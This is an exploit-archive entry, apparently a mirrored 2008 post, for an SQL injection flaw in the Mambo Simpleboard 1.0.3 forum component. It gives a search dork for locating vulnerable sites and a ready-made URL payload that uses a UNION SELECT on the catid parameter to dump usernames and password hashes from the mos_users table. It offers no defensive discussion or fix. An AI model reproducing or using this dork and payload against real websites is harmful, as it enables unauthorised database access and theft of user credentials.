[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mambo Component Simpleboard 1.0.3 (catid) SQL Injection Vulnerability
# Published : 2008-02-27
# Author : it's my
# Previous Title : PHP-Nuke My_eGallery <= 2.7.9 Remote SQL Injection Vulnerability
# Next Title : Centreon <= 1.4.2.3 (get_image.php) Remote File Disclosure Exploit
#########################################################
##
## Mambo Simpleboard Forum Component 1.0.3 Stable (com_simpleboard)
##
##
## Author: it's my, Scipio, xcedz
##
## Home page: http://www.antichat.ru
##
#########################################################
##
## Dork: inurl:"index.php?option=com_simpleboard"
##
#########################################################
Exploit:
http://site.com/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*
#########################################################
## Together, we have strength =) #### www.antichat.ru
#########################################################
# www.Syue.com [2008-02-27]